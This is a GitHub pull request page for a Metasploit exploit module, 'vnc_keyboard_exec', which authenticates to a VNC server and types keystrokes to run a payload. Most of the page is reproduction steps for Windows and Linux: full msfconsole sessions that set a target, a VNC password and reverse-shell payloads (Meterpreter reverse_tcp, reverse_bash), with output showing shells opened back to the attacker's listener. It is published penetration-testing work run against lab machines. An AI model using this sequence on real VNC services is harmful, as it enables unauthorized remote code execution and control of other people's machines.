VNC Keyboard Exec #5693
Merged
VNC Keyboard Exec #5693
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
Landed after some cleanup! thanks again @xistence Test after changes: |
|
This is awesome, @xistence! |
|
Great work. :) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This module connects to a VNC service and sends keystrokes to "type" and execute a payload.
(For extra fun watch the commands getting typed in the Windows/Linux GUI:))
Windows
Steps to reproduce (Tested on Windows 7 Pro SP1 64-bit):
Download Tightvnc (http://www.tightvnc.com/download.php) or RealVNC (https://www.realvnc.com/download/)
Install and set a password
msf > use exploit/multi/vnc/vnc_keyboard_exec
msf exploit(vnc_keyboard_exec) > set RHOST 192.168.2.131
RHOST => 192.168.2.131
msf exploit(vnc_keyboard_exec) > set target 0
target => 0
msf exploit(vnc_keyboard_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(vnc_keyboard_exec) > set PASSWORD pwned
PASSWORD => pwned
msf exploit(vnc_keyboard_exec) > exploit
[] Started reverse handler on 192.168.2.130:4444
[] 192.168.2.131:5900 - Trying to authenticate against VNC server
[] 192.168.2.131:5900 - Authenticated
[] 192.168.2.131:5900 - Opening Run command
[] 192.168.2.131:5900 - Typing and executing payload
[] Sending stage (884782 bytes) to 192.168.2.131
[*] Meterpreter session 77 opened (192.168.2.130:4444 -> 192.168.2.131:49243) at 2015-07-10 13:32:49 +0700
meterpreter >
Linux
Steps to reproduce (tested on Kali linux):
apt-get install tightvncserver
tightvncpasswd
tightvncserver
Check on which port tightvnc is started, on my machine this was 5901 (5900+1 because of new X11 session on :1)
msf > use exploit/multi/vnc/vnc_keyboard_exec
msf exploit(vnc_keyboard_exec) > set RHOST 192.168.2.130
RHOST => 192.168.2.130
msf exploit(vnc_keyboard_exec) > set target 2
target => 2
msf exploit(vnc_keyboard_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(vnc_keyboard_exec) > set RPORT 5901
RPORT => 5901
msf exploit(vnc_keyboard_exec) > set PASSWORD pwned
PASSWORD => pwned
msf exploit(vnc_keyboard_exec) > exploit
[] Started reverse handler on 192.168.2.130:4444
[] 192.168.2.130:5901 - Trying to authenticate against VNC server
[] 192.168.2.130:5901 - Authenticated
[] 192.168.2.130:5901 - Opening "Run Application"
[] 192.168.2.130:5901 - Opening xterm
[] 192.168.2.130:5901 - Typing and executing payload
[*] Command shell session 76 opened (192.168.2.130:4444 -> 192.168.2.130:34240) at 2015-07-10 13:30:33 +0700